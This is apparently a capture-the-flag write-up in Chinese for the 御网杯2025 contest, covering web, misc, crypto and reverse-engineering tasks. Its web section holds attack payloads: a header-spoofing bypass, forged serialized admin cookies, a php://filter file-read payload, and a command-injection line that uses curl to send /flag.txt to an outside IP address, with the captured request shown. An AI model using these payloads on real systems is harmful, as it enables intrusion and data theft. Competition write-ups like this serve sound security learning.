御网杯2025 wp by ENOCH
最后得分2240
全国排名大概在七百多的样子
web
YWB_Web_xff
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
if ($cip == "2.2.2.1") {
echo '<div class="success">';
echo '<h2>登录成功!</h2>';
$flag = file_get_contents('/flag.txt');
echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
echo '</div>';
}可以通过添加X-Forwarded-For头来绕过
YWB_Web_未授权访问
查看cookies发现有url编码的序列化数据
修改name和isAdmin字段后设置为cookies即可
O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D
easyweb
没有回显,就curl发送到服务器即可
cmd=curl -d @/flag.txt http://8.138.179.228:9999
Request Method: POST
User-Agent: curl/7.74.0
Accept: /
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
Request Args: ImmutableMultiDict([])
Request Form Data: ImmutableMultiDict([('flag{d4ek6s7kzztx}', '')])
Request JSON Data: None
47.105.113.86 - - [11/May/2025 10:22:17] "POST / HTTP/1.1" 200 -YWB_Web_命令执行过滤绕过
?cmd=readfile('php://filter/read=convert.base64-encode/resource=/tmp/flag.nisp');
反序列化
<?php
class mylogin {
var $user;
var $pass;
}
$obj = new mylogin();
$obj->user = "1";
$obj->pass = "myzS@11wawq"; // 必须严格匹配
echo serialize($obj);
?>O:7:"mylogin":2:{s:4:"user";s:1:"1";s:4:"pass";s:11:"myzS@11wawq";}
misc
ez_xor
明显是xor,但是不知道密钥
爆破出密钥即可
cipher = "5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-0d-0f-44"
cipher_bytes = bytes.fromhex(cipher.replace('-', ''))
known_prefix = b"flag{"
xor_key = cipher_bytes[0] ^ known_prefix[0] # 0x5f ^ 'f' = 0x39
for i in range(5):
assert cipher_bytes[i] ^ xor_key == known_prefix[i], "密钥不匹配"
plain = bytes([b ^ xor_key for b in cipher_bytes])
print(f"解密结果: {plain.decode('utf-8')}")flag{HCTFqweASD146}
被折叠的显影图纸
直接随波逐流发现有flag{}字样
光隙中的寄生密钥
图片里隐写了一个zip
爆破密码即可
内容16进制转ascii然后base64解码
misc
10进制转字符: M1BMSkhDNFQ2Z2hWbWJLREZ5cXd2VWtQTFVNVzVFb0U=
混合解码结果:synt{UAPGSQFaDfY1QCmSa}
Rot13解码: flag{HNCTFDSnQsL1DPzFn}
套娃
先zip解压然后zip解压
最后在word\document.xml中找到了flag
密码
cry_rsa
p = 473398607161
q = 4511491
e = 19
# 计算φ(n)
phi = (p - 1) * (q - 1)
# 计算d为e的模逆元
d = pow(e, -1, phi)
# 生成flag
flag = d + 4
print(f"flag{{{flag}}}")
#flag{2023326077889096383}草甸方阵的密语
先栅栏密码分7栏
然后凯撒密码解密
gift
五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿,所以把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗?flag示例: flag{apple} flag{watermelon} 提交flag值凯撒密码加密,偏移量9在提交。计算发现是π
英文pai,偏移量9
所以flag是flag{yrn}
easy-签到题
ciphey一把梭
得到的16进制字符转成ascii即可
baby-rsa
根据题目qp的性质(相邻)可以写出以下脚本
from Crypto.Util.number import long_to_bytes
import gmpy2
N = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
e = 65537
c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063
# 1. 计算N的平方根
sqrt_N = gmpy2.isqrt(N)
# 2. 寻找q和p
q = None
for i in range(2000): # 在附近一定范围内搜索
test_q = sqrt_N - i
if N % test_q == 0:
q = test_q
p = N // q
# 验证p是q的下一个质数
next_q = gmpy2.next_prime(q)
if p == next_q:
break
# 3. 验证分解结果
assert q is not None, "分解失败"
assert p * q == N, "分解错误"
print(f"分解成功: q = {q}\np = {p}")
# 4. 计算私钥
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
# 5. 解密
m = pow(c, d, N)
flag = long_to_bytes(m).strip()
flag=flag.decode()
#把所有的8换成9
flag=flag.replace('8','9')
print(flag)逆向
signin
先upx脱壳
一个简单的rc4加密
按照逻辑将密文以及密钥提取出来即可
from Crypto.Cipher import ARC4
# 密钥处理(小端序转换)
def qword_to_le_bytes(qword):
return bytes.fromhex(f"{qword:016x}")[::-1]
v1 = [
0xB8C6B89FC8B99FC8,
0xCFB7B0C51443528F,
0xB1A8C6B99BC7AC9C,
0xBDC68AB3C59299C5
]
key = b''.join(qword_to_le_bytes(q) for q in v1) # 32 bytes
# v2 = -1499806587 → 0xA562D985 → 小端序: 85 D9 62 A5
v2 = (-1499806587 & 0xFFFFFFFF).to_bytes(4, 'little') # 4 bytes
key += v2 # 总密钥长度 36 bytes
# 加密数据(小端序转换)
v3 = [
0xC44745F289B15A46,
0xBA8BB14D62D35502,
0xB528D46C87D08D0A
]
encrypted = b''.join(qword_to_le_bytes(q) for q in v3) # 24 bytes
# v4[0] = 0xA56220992C994B26 → 小端序前7字节: 26 4B 99 2C 99 20 62
v4_part1 = qword_to_le_bytes(0xA56220992C994B26)[:7] # 截取前7字节
# 覆盖部分: 从偏移7写入8字节 (0x2AC19853F3F7A5 的小端序补零为8字节)
overlap = bytes.fromhex("A5F7F35398C12A00") # 8 bytes
encrypted += v4_part1 + overlap # 总长度 24 +7 +8 =39 bytes
# RC4解密
cipher = ARC4.new(key)
plaintext = cipher.decrypt(encrypted)
print("Decrypted Flag:", plaintext.decode('ascii'))这比赛估计也有个几百名的水分,但是比起著名的pycc已经好很多了
题目web,misc,密码都挺简单
逆向有点难,只出了一题
pwn则是压根不会。。。
许可协议:
CC BY 4.0